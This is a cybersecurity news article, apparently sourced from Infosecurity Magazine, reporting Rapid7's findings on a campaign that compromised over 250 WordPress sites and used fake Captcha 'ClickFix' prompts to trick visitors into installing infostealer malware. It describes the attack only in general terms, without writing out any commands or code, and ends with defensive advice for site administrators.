Cyber-Criminal Campaign Compromises WordPress Sites to Deploy Infostealer Malware
A significant cyber-criminal initiative has infiltrated legitimate WordPress websites, resulting in the infection of unsuspecting visitors with infostealer malware, as cautioned by threat researchers from Rapid7.
This extensive operation has affected more than 250 websites, encompassing regional news organizations, local enterprises, and the official webpage of a Senate candidate in the United States.
Impacts have been observed across at least 12 nations, including Australia, Brazil, Canada, Czechia, Germany, India, Israel, Singapore, Slovakia, Switzerland, the UK, and the US.
The attackers aim to manipulate users’ trust in these legitimate platforms to covertly implant infostealer malware, facilitating the theft of sensitive information such as login credentials and financial details.
Active since December 2025, the campaign has raised alarm bells among experts. In a blog post by Rapid7, researchers emphasized the perilous nature of this threat, noting that the exploitation of credible websites heightens risks for both individuals and organizations.
When users visit an infected site, they are confronted with a façade resembling a Cloudflare Captcha page—something they might typically expect. However, this disguise serves a nefarious purpose, initiating the infection sequence.
Fake Captcha and ClickFix Attacks: A Deceptive Tactic
The cybercriminals employ a technique known as ClickFix, a social engineering ploy that utilizes dialogue boxes with fictitious verification prompts, misleading users into copying, pasting, and executing malicious code on their own devices.
In this scenario, the counterfeit Captcha instructs the user to access the Windows Run command interface and paste a specific command under the pretext of enhanced verification. This command orchestrates a multi-stage operation, downloading and installing malware onto the user’s machine.
The observed Infostealer payloads disseminated via the compromised WordPress sites comprise Vidar Stealer, Impure Stealer, Vodka Stealer, and Double Donut, the latter commonly associated with ClickFix operations.
Regardless of the specific payload employed, the objective remains consistent: to harvest usernames, passwords, digital wallets, and other confidential data from the victim.
The stolen credentials may be exploited by the perpetrators of this campaign or traded on underground forums, facilitating financial fraud or enabling further, more targeted assaults on organizations.
Researchers from Rapid7 cautioned, “The extensive deployment of compromises across disparate WordPress instances indicates a remarkable level of automation by the threat actor and likely signifies an organized, long-term criminal effort.”
The exact methodology through which attackers have breached the targeted WordPress sites remains unclear.
However, Rapid7 speculates that it could involve exploiting vulnerabilities in a WordPress plugin or theme, misusing previously stolen credentials, or gaining access to publicly available admin interfaces through brute-force password attacks.
To assist WordPress site administrators, Rapid7 has provided the following recommendations:
- Regularly audit all software components for outdated versions and conduct vulnerability scans to identify and remediate weaknesses.
- Employ long and unpredictable passwords for administrative access, potentially utilizing a password manager for enhanced security and convenience.
- Implement a secondary authentication factor for administrative access.
- Avoid executing untrusted code on devices that store credentials (e.g., saved logins in a browser) that are necessary for website administration.
Rapid7 has alerted US authorities regarding the compromise of the Senate candidate’s official webpage.
Source link: Infosecurity-magazine.com.
